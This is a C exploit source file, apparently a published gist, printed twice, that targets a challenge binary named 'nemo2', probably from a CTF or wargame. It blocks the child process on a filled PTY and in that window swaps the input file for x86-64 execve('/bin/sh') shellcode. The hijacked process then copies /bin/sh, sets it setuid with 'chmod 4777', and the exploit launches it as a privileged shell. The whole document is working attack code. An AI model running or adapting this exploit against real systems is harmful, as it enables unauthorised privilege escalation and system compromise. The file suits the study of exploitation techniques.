saelo/sploit.c

## sploit.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <signal.h>
#include <pty.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char buf[0x10000];

// ./nemo2 input | wc
#define CHILD_OUTPUT_LEN 113

char sc[] =
    "\x48\x31\xd2"                                  // xor    %rdx, %rdx
    "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
    "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
    "\x53"                                          // push   %rbx
    "\x48\x89\xe7"                                  // mov    %rsp, %rdi
    "\x50"                                          // push   %rax
    "\x57"                                          // push   %rdi
    "\x48\x89\xe6"                                  // mov    %rsp, %rsi
    "\xb0\x3b"                                      // mov    $0x3b, %al
    "\x0f\x05\x00";                                 // syscall

void die(const char* msg)
{
    fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno));
    exit(-1);
}

int main()
{
    int master, slave;

    system("cp input in");

    puts("[*] Opening PTY to connect child to...");
    if (openpty(&master, &slave, NULL, NULL, NULL)) {
        die("openpty");
    }

    puts("[*] Done. Now filling pipe so child will block when writing to it...");
    int flags = fcntl(slave, F_GETFL, 0);
    fcntl(slave, F_SETFL, flags | O_NONBLOCK);
    while(write(slave, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 50) > 0);
    fcntl(slave, F_SETFL, flags & ~O_NONBLOCK);

    read(master, buf, CHILD_OUTPUT_LEN-1);

    puts("[*] Pipe filled, spawning child now...");

    int pid = fork();
    if (pid < 0) {
        die("fork");
    } else if (pid == 0) {
        dup2(slave, 0);
        dup2(slave, 1);
        close(2);
        execl("./nemo2", "nemo2", "./in", NULL);
        die("execve");
    }

    puts("[*] Child spawned, waiting for it to block on (last) write...");
    usleep(500000);

    puts("[*] Changing shellcode to do something useful...");
    int fd = open("./in", O_RDWR);
    if (fd == -1) {
        die("open");
    }
    write(fd, sc, strlen(sc));
    close(fd);

    puts("[*] Done, clearing pipe now so child can continue...");
    flags = fcntl(master, F_GETFL, 0);
    fcntl(master, F_SETFL, flags | O_NONBLOCK);
    while(read(master, buf, 0x10000) > 0);

    puts("[*] Pipe cleared, child should continue now");

    //write(master, "touch pwned\r\n", 13);
    write(master, "cp /bin/sh .\r\n", 14);
    write(master, "chmod 4777 sh\r\n", 15);
    write(master, "exit\r\n", 6);
    waitpid(pid, 0, 0);

    puts("[+] All done, spawning shell!");
    execl("./sh", "sh", NULL);
    die("execl");

    return 0;
}
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#include <stdlib.h>
	#include <errno.h>
	#include <signal.h>
	#include <pty.h>
	#include <sys/types.h>
	#include <sys/stat.h>
	#include <fcntl.h>

	char buf[0x10000];

	// ./nemo2 input \| wc
	#define CHILD_OUTPUT_LEN 113

	char sc[] =
	"\x48\x31\xd2" // xor %rdx, %rdx
	"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
	"\x48\xc1\xeb\x08" // shr $0x8, %rbx
	"\x53" // push %rbx
	"\x48\x89\xe7" // mov %rsp, %rdi
	"\x50" // push %rax
	"\x57" // push %rdi
	"\x48\x89\xe6" // mov %rsp, %rsi
	"\xb0\x3b" // mov $0x3b, %al
	"\x0f\x05\x00"; // syscall

	void die(const char* msg)
	{
	fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno));
	exit(-1);
	}

	int main()
	{
	int master, slave;

	system("cp input in");

	puts("[*] Opening PTY to connect child to...");
	if (openpty(&master, &slave, NULL, NULL, NULL)) {
	die("openpty");
	}

	puts("[*] Done. Now filling pipe so child will block when writing to it...");
	int flags = fcntl(slave, F_GETFL, 0);
	fcntl(slave, F_SETFL, flags \| O_NONBLOCK);
	while(write(slave, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 50) > 0);
	fcntl(slave, F_SETFL, flags & ~O_NONBLOCK);

	read(master, buf, CHILD_OUTPUT_LEN-1);

	puts("[*] Pipe filled, spawning child now...");

	int pid = fork();
	if (pid < 0) {
	die("fork");
	} else if (pid == 0) {
	dup2(slave, 0);
	dup2(slave, 1);
	close(2);
	execl("./nemo2", "nemo2", "./in", NULL);
	die("execve");
	}

	puts("[*] Child spawned, waiting for it to block on (last) write...");
	usleep(500000);

	puts("[*] Changing shellcode to do something useful...");
	int fd = open("./in", O_RDWR);
	if (fd == -1) {
	die("open");
	}
	write(fd, sc, strlen(sc));
	close(fd);

	puts("[*] Done, clearing pipe now so child can continue...");
	flags = fcntl(master, F_GETFL, 0);
	fcntl(master, F_SETFL, flags \| O_NONBLOCK);
	while(read(master, buf, 0x10000) > 0);

	puts("[*] Pipe cleared, child should continue now");

	//write(master, "touch pwned\r\n", 13);
	write(master, "cp /bin/sh .\r\n", 14);
	write(master, "chmod 4777 sh\r\n", 15);
	write(master, "exit\r\n", 6);
	waitpid(pid, 0, 0);

	puts("[+] All done, spawning shell!");
	execl("./sh", "sh", NULL);
	die("execl");

	return 0;
	}